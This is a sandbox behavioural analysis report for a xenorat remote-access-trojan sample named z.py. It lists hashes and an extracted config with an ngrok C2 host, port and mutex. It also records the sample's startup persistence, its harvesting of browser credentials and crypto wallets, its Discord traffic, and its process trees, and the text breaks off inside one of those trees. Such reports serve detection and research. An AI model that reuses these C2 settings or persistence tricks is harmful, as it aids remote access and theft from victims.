xenorat | 7aa64aad2b06dfed71dca4bcd403d9fe8e1a6d12b10a05eee75d8c00afb1fe63

Analysis

max time kernel
352s
max time network
356s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07-04-2024 07:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z.py
Size

944B
MD5

53208bd6bf45b2bab3cd17d972b7bcc0
SHA1

5b269abcb7f3ff5306517bc16bd0cdb9e4159837
SHA256

7aa64aad2b06dfed71dca4bcd403d9fe8e1a6d12b10a05eee75d8c00afb1fe63
SHA512

426398bff0cd9d34656cdede15b251ca1d5bf3a9b110cf35f7395f81bc4b2bda42e04667d008e2164d1c6709fd1ebfec95570211d55b1b5d93e8e74e3a13b236

Score

10^/10

xenorat persistence pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

xenorat

6.tcp.ngrok.io

Mutex

fdsfdsfsdfsdfnd8912d

Attributes

delay
1000
install_path
appdata
port
17147
startup_name
Intel Processor ©

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE

Executes dropped EXE 35 IoCs

pid	Process
2596	NyroxV1.2.EXE
3708	NYROXV~1.EXE
4160	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2196	DMMEIF~1.EXE
4652	System32.exe
2288	System32.exe
3284	EPICGA~1.EXE
372	EPICGA~1.EXE
2136	NyroxV1.2.EXE
3020	NYROXV~1.EXE
4052	FOLLOW~1.EXE
1736	FOLLOW~1.EXE
1740	WINDOW~1.EXE
2576	System32.exe
1208	System32.exe
1520	svchost.exe
1524	svchost.exe
3516	DMMEIF~1.EXE
916	System32.exe
2004	System32.exe
464	NyroxV1.2.EXE
2536	NYROXV~1.EXE
3916	FOLLOW~1.EXE
372	FOLLOW~1.EXE
1740	EPICGA~1.EXE
2448	EPICGA~1.EXE
3964	WINDOW~1.EXE
4776	System32.exe
5044	System32.exe
1760	svchost.exe
3100	DMMEIF~1.EXE
3236	System32.exe
4444	System32.exe
3916	EPICGA~1.EXE

Loads dropped DLL 64 IoCs

pid	Process
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2128	FOLLOW~1.EXE
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2288-711-0x0000000074D90000-0x000000007529B000-memory.dmp	upx
behavioral2/memory/2288-712-0x0000000074D40000-0x0000000074D5F000-memory.dmp	upx
behavioral2/memory/2288-713-0x0000000074D30000-0x0000000074D3D000-memory.dmp	upx
behavioral2/memory/2288-714-0x0000000074D10000-0x0000000074D28000-memory.dmp	upx
behavioral2/memory/2288-715-0x0000000074CE0000-0x0000000074D07000-memory.dmp	upx
behavioral2/memory/2288-716-0x0000000074CC0000-0x0000000074CD6000-memory.dmp	upx
behavioral2/memory/2288-717-0x0000000074C70000-0x0000000074C7C000-memory.dmp	upx
behavioral2/memory/2288-718-0x0000000074C40000-0x0000000074C6F000-memory.dmp	upx
behavioral2/memory/2288-719-0x0000000074C30000-0x0000000074C3C000-memory.dmp	upx
behavioral2/memory/2288-720-0x0000000074B60000-0x0000000074C00000-memory.dmp	upx
behavioral2/memory/2288-721-0x0000000074C00000-0x0000000074C27000-memory.dmp	upx
behavioral2/memory/2288-722-0x0000000074D90000-0x000000007529B000-memory.dmp	upx
behavioral2/memory/2288-723-0x0000000074D40000-0x0000000074D5F000-memory.dmp	upx
behavioral2/memory/2288-724-0x0000000074690000-0x00000000746B4000-memory.dmp	upx
behavioral2/memory/2288-725-0x0000000074620000-0x0000000074648000-memory.dmp	upx
behavioral2/memory/2288-726-0x0000000074580000-0x0000000074614000-memory.dmp	upx
behavioral2/memory/2288-728-0x0000000074320000-0x000000007457A000-memory.dmp	upx
behavioral2/memory/2288-731-0x0000000074300000-0x0000000074312000-memory.dmp	upx
behavioral2/memory/2288-732-0x00000000742F0000-0x00000000742FF000-memory.dmp	upx
behavioral2/memory/2288-733-0x0000000074CE0000-0x0000000074D07000-memory.dmp	upx
behavioral2/memory/2288-734-0x0000000074CC0000-0x0000000074CD6000-memory.dmp	upx
behavioral2/memory/2288-735-0x0000000074270000-0x000000007428B000-memory.dmp	upx
behavioral2/memory/2288-736-0x0000000074130000-0x0000000074267000-memory.dmp	upx
behavioral2/memory/2288-737-0x0000000074110000-0x0000000074126000-memory.dmp	upx
behavioral2/memory/2288-738-0x0000000074C70000-0x0000000074C7C000-memory.dmp	upx
behavioral2/memory/2288-739-0x0000000074050000-0x0000000074060000-memory.dmp	upx
behavioral2/memory/2288-740-0x0000000074C40000-0x0000000074C6F000-memory.dmp	upx
behavioral2/memory/2288-741-0x0000000074010000-0x0000000074032000-memory.dmp	upx
behavioral2/memory/2288-742-0x0000000074B60000-0x0000000074C00000-memory.dmp	upx
behavioral2/memory/2288-743-0x0000000073EF0000-0x0000000074009000-memory.dmp	upx
behavioral2/memory/2288-744-0x0000000073EB0000-0x0000000073EE1000-memory.dmp	upx
behavioral2/memory/2288-754-0x0000000074620000-0x0000000074648000-memory.dmp	upx
behavioral2/memory/2288-755-0x0000000074320000-0x000000007457A000-memory.dmp	upx
behavioral2/memory/2288-756-0x0000000073E60000-0x0000000073E6A000-memory.dmp	upx
behavioral2/memory/2288-757-0x0000000073E30000-0x0000000073E3C000-memory.dmp	upx
behavioral2/memory/2288-759-0x0000000073E40000-0x0000000073E4A000-memory.dmp	upx
behavioral2/memory/2288-760-0x0000000073E20000-0x0000000073E2D000-memory.dmp	upx
behavioral2/memory/2288-761-0x0000000074580000-0x0000000074614000-memory.dmp	upx
behavioral2/memory/2288-762-0x0000000073DE0000-0x0000000073DEA000-memory.dmp	upx
behavioral2/memory/2288-763-0x0000000073DA0000-0x0000000073DAA000-memory.dmp	upx
behavioral2/memory/2288-765-0x0000000073DC0000-0x0000000073DCA000-memory.dmp	upx
behavioral2/memory/2288-764-0x0000000073B70000-0x0000000073D9C000-memory.dmp	upx
behavioral2/memory/2288-766-0x0000000073DB0000-0x0000000073DC0000-memory.dmp	upx
behavioral2/memory/2288-768-0x0000000073B30000-0x0000000073B55000-memory.dmp	upx
behavioral2/memory/2288-769-0x0000000074D90000-0x000000007529B000-memory.dmp	upx
behavioral2/memory/2288-771-0x0000000074D30000-0x0000000074D3D000-memory.dmp	upx
behavioral2/memory/2288-772-0x0000000074D10000-0x0000000074D28000-memory.dmp	upx
behavioral2/memory/2288-770-0x0000000074D40000-0x0000000074D5F000-memory.dmp	upx
behavioral2/memory/2288-773-0x0000000074CE0000-0x0000000074D07000-memory.dmp	upx
behavioral2/memory/2288-774-0x0000000074CC0000-0x0000000074CD6000-memory.dmp	upx
behavioral2/memory/2288-775-0x0000000074C70000-0x0000000074C7C000-memory.dmp	upx
behavioral2/memory/2288-776-0x0000000074C40000-0x0000000074C6F000-memory.dmp	upx
behavioral2/memory/2288-777-0x0000000074C30000-0x0000000074C3C000-memory.dmp	upx
behavioral2/memory/2288-778-0x0000000074C00000-0x0000000074C27000-memory.dmp	upx
behavioral2/memory/2288-779-0x0000000074B60000-0x0000000074C00000-memory.dmp	upx
behavioral2/memory/2288-780-0x0000000074690000-0x00000000746B4000-memory.dmp	upx
behavioral2/memory/2288-783-0x0000000074320000-0x000000007457A000-memory.dmp	upx
behavioral2/memory/2288-782-0x0000000074580000-0x0000000074614000-memory.dmp	upx
behavioral2/memory/2288-785-0x00000000742F0000-0x00000000742FF000-memory.dmp	upx
behavioral2/memory/2288-784-0x0000000074300000-0x0000000074312000-memory.dmp	upx
behavioral2/memory/2288-781-0x0000000074620000-0x0000000074648000-memory.dmp	upx
behavioral2/memory/2288-786-0x0000000074270000-0x000000007428B000-memory.dmp	upx
behavioral2/memory/2288-787-0x0000000074130000-0x0000000074267000-memory.dmp	upx
behavioral2/memory/2288-788-0x0000000074110000-0x0000000074126000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DMMEIF~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	NyroxV1.2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	NYROXV~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DMMEIF~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	NYROXV~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	NyroxV1.2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	NYROXV~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	WINDOW~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NyroxV1.2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	DMMEIF~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	WINDOW~1.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 55 IoCs

Web Service

T1102

flow	ioc
258	discord.com
200	discord.com
223	discord.com
264	discord.com
251	discord.com
215	discord.com
229	discord.com
230	discord.com
255	discord.com
266	discord.com
267	discord.com
199	discord.com
265	discord.com
283	6.tcp.ngrok.io
218	discord.com
221	discord.com
253	discord.com
268	discord.com
272	discord.com
276	discord.com
219	discord.com
278	discord.com
217	discord.com
227	discord.com
225	discord.com
228	discord.com
234	6.tcp.ngrok.io
262	discord.com
263	discord.com
275	discord.com
203	discord.com
220	discord.com
222	discord.com
256	discord.com
259	discord.com
274	discord.com
202	discord.com
204	discord.com
205	discord.com
206	discord.com
208	discord.com
273	discord.com
207	discord.com
224	discord.com
271	discord.com
270	discord.com
277	discord.com
296	6.tcp.ngrok.io
214	discord.com
226	discord.com
231	6.tcp.ngrok.io
254	discord.com
269	discord.com
216	discord.com
257	discord.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
236	api.ipify.org
241	api.ipify.org
298	api.ipify.org
176	api.ipify.org
177	api.ipify.org
184	api.ipify.org

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x00050000000162ae-549.dat	pyinstaller
behavioral2/files/0x00060000000162a8-1234.dat	pyinstaller
behavioral2/files/0x00070000000162ac-1237.dat	pyinstaller
behavioral2/files/0x00080000000162ac-1703.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
960	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-513485977-2495024337-1260977654-1000\{2D2AFFE5-0181-4FAE-BC9F-14F338B71448}	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2744	msedge.exe
2744	msedge.exe
4868	msedge.exe
4868	msedge.exe
1548	identity_helper.exe
1548	identity_helper.exe
1736	msedge.exe
1736	msedge.exe
1840	msedge.exe
1840	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2288	System32.exe
2004	System32.exe
2004	System32.exe
2004	System32.exe
2004	System32.exe
4444	System32.exe
4444	System32.exe
4444	System32.exe
4444	System32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

pid	Process
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2516	7zG.exe
Token: 35	2516	7zG.exe
Token: SeSecurityPrivilege	2516	7zG.exe
Token: SeSecurityPrivilege	2516	7zG.exe
Token: SeDebugPrivilege	2288	System32.exe
Token: SeIncreaseQuotaPrivilege	3324	WMIC.exe
Token: SeSecurityPrivilege	3324	WMIC.exe
Token: SeTakeOwnershipPrivilege	3324	WMIC.exe
Token: SeLoadDriverPrivilege	3324	WMIC.exe
Token: SeSystemProfilePrivilege	3324	WMIC.exe
Token: SeSystemtimePrivilege	3324	WMIC.exe
Token: SeProfSingleProcessPrivilege	3324	WMIC.exe
Token: SeIncBasePriorityPrivilege	3324	WMIC.exe
Token: SeCreatePagefilePrivilege	3324	WMIC.exe
Token: SeBackupPrivilege	3324	WMIC.exe
Token: SeRestorePrivilege	3324	WMIC.exe
Token: SeShutdownPrivilege	3324	WMIC.exe
Token: SeDebugPrivilege	3324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3324	WMIC.exe
Token: SeRemoteShutdownPrivilege	3324	WMIC.exe
Token: SeUndockPrivilege	3324	WMIC.exe
Token: SeManageVolumePrivilege	3324	WMIC.exe
Token: 33	3324	WMIC.exe
Token: 34	3324	WMIC.exe
Token: 35	3324	WMIC.exe
Token: 36	3324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3324	WMIC.exe
Token: SeSecurityPrivilege	3324	WMIC.exe
Token: SeTakeOwnershipPrivilege	3324	WMIC.exe
Token: SeLoadDriverPrivilege	3324	WMIC.exe
Token: SeSystemProfilePrivilege	3324	WMIC.exe
Token: SeSystemtimePrivilege	3324	WMIC.exe
Token: SeProfSingleProcessPrivilege	3324	WMIC.exe
Token: SeIncBasePriorityPrivilege	3324	WMIC.exe
Token: SeCreatePagefilePrivilege	3324	WMIC.exe
Token: SeBackupPrivilege	3324	WMIC.exe
Token: SeRestorePrivilege	3324	WMIC.exe
Token: SeShutdownPrivilege	3324	WMIC.exe
Token: SeDebugPrivilege	3324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3324	WMIC.exe
Token: SeRemoteShutdownPrivilege	3324	WMIC.exe
Token: SeUndockPrivilege	3324	WMIC.exe
Token: SeManageVolumePrivilege	3324	WMIC.exe
Token: 33	3324	WMIC.exe
Token: 34	3324	WMIC.exe
Token: 35	3324	WMIC.exe
Token: 36	3324	WMIC.exe
Token: SeDebugPrivilege	2004	System32.exe
Token: SeIncreaseQuotaPrivilege	5072	WMIC.exe
Token: SeSecurityPrivilege	5072	WMIC.exe
Token: SeTakeOwnershipPrivilege	5072	WMIC.exe
Token: SeLoadDriverPrivilege	5072	WMIC.exe
Token: SeSystemProfilePrivilege	5072	WMIC.exe
Token: SeSystemtimePrivilege	5072	WMIC.exe
Token: SeProfSingleProcessPrivilege	5072	WMIC.exe
Token: SeIncBasePriorityPrivilege	5072	WMIC.exe
Token: SeCreatePagefilePrivilege	5072	WMIC.exe
Token: SeBackupPrivilege	5072	WMIC.exe
Token: SeRestorePrivilege	5072	WMIC.exe
Token: SeShutdownPrivilege	5072	WMIC.exe
Token: SeDebugPrivilege	5072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5072	WMIC.exe
Token: SeRemoteShutdownPrivilege	5072	WMIC.exe
Token: SeUndockPrivilege	5072	WMIC.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
2516	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3256	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 3428	4868	msedge.exe	97
PID 4868 wrote to memory of 3428	4868	msedge.exe	97
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 1568	4868	msedge.exe	98
PID 4868 wrote to memory of 2744	4868	msedge.exe	99
PID 4868 wrote to memory of 2744	4868	msedge.exe	99
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100
PID 4868 wrote to memory of 2064	4868	msedge.exe	100

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\z.py
1⤵
- Modifies registry class
PID:840

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd4e8146f8,0x7ffd4e814708,0x7ffd4e814718
  2⤵
  PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,8222822578369397404,6391224064419399147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
